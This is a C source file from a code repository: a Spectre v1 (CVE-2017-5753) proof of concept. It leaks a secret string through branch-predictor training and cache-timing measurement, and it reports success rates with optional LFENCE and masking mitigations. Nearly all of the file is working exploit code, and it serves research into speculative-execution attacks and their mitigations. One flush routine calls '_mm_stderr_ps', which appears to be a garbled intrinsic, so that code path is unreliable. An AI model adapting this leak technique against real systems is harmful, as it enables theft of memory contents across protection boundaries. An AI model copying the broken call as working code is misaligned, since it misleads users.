octopus/spectre_v1.c

415 lines
12 KiB
C
Raw Normal View History

/* spectre.c - CVE-2017-5753 user-to-user sucess rate measurement
*
* Borrows code from
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
* - https://github.com/genua/meltdown
*
* Copyright (c) 2022 Samuel AUBERTIN
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(
unsigned long index,
unsigned long size
)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold;
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
void
victim_function(
size_t x
)
{
if (x < array1_size) {
#ifdef LFENCE_MITIGATION
/*
* According to Intel et al, the best way to mitigate this is to
* add a serializing instruction after the boundary check to force
* the retirement of previous instructions before proceeding to
* the read.
* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
*/
_mm_lfence();
#endif
#ifdef MASKING_MITIGATION
x &= array_index_mask_nospec(x, array1_size);
#endif
temp &= array2[array1[x] * 512];
}
}
void
leak(
size_t malicious_x,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{
static int results[256];
int tries, i, j, mix_i;
unsigned int junk = 0;
size_t training_x, x;
volatile uint8_t *addr;
#ifdef NOCLFLUSH
int junk2 = 0;
int l;
(void)junk2;
#endif
for (i = 0; i < 256; i++) {
results[i] = 0;
}
for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]);
#else
/* Flush array2[256*(0..255)] from cache
using long SSE instruction several times */
for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) {
flush_memory_sse( & array2[i * 512]);
}
}
#endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
_mm_clflush(&array1_size);
#else
/* Alternative to using clflush to flush the CPU cache
* Read addresses at 4096-byte intervals out of a large array.
* Do this around 2000 times, or more depending on CPU cache size. */
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
junk2 = cache_flush_array[l];
}
#endif
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest results in j */
j = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
j = i;
}
}
if (results[j] >= 3)
break;
}
results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j;
score[0] = results[j];
}
int
main(
int argc,
char** argv
)
{
int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int i, score[2], len = (int)strlen(secret);
uint8_t value[2];
unsigned successes = 0;
int json = 0;
while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) {
case 't':
cache_hit_threshold = atoi(optarg);
break;
case 'j':
json++;
break;
default:
usage:
fprintf(stderr, "usage: %s [-j] "
"[-t threshold]\n"
"\t-j\t\tJSON output\n"
"\t-t INT\t\tfixed threshold\n", argv[0]);
return 1;
}
}
if (argc != optind)
goto usage;
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
argv[0] + 2,
(int)strlen(secret));
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1;
}
#endif
for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
successes++;
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
} else {
fprintf(stderr, "\033[31m?\033[0m");
}
}
fprintf(stderr, "\n");
if (json) {
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
#ifndef NORDTSCP
printf("\"rdtscp\": true, ");
#else
printf("\"rdtscp\": false, ");
#endif
#ifndef NOMFENCE
printf("\"mfence\": true, ");
#else
printf("\"mfence\": false, ");
#endif
#ifndef NOCLFLUSH
printf("\"clflush\": true ");
#else
printf("\"clflush\": false ");
#endif
printf("}, \"mitigations\": { ");
#ifdef LFENCE_MITIGATION
printf("\"lfence\": true, ");
#else
printf("\"lfence\": false, ");
#endif
#ifdef MASKING_MITIGATION
printf("\"masking\": true ");
#else
printf("\"masking\": false ");
#endif
printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }",
100 * successes / (float)strlen(secret));
}
fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP
fprintf(stderr, "RDTSCP ");
#else
fprintf(stderr, "RDTSC ");
#endif
#ifndef NOMFENCE
fprintf(stderr, "MFENCE ");
#endif
#ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH ");
#endif
#ifdef LFENCE_MITIGATION
fprintf(stderr, "LFENCE_MITIGATION ");
#endif
#ifdef MASKING_MITIGATION
fprintf(stderr, "MASKING_MITIGATION ");
#endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
cache_hit_threshold,
100 * successes / (float)strlen(secret));
return 0;
}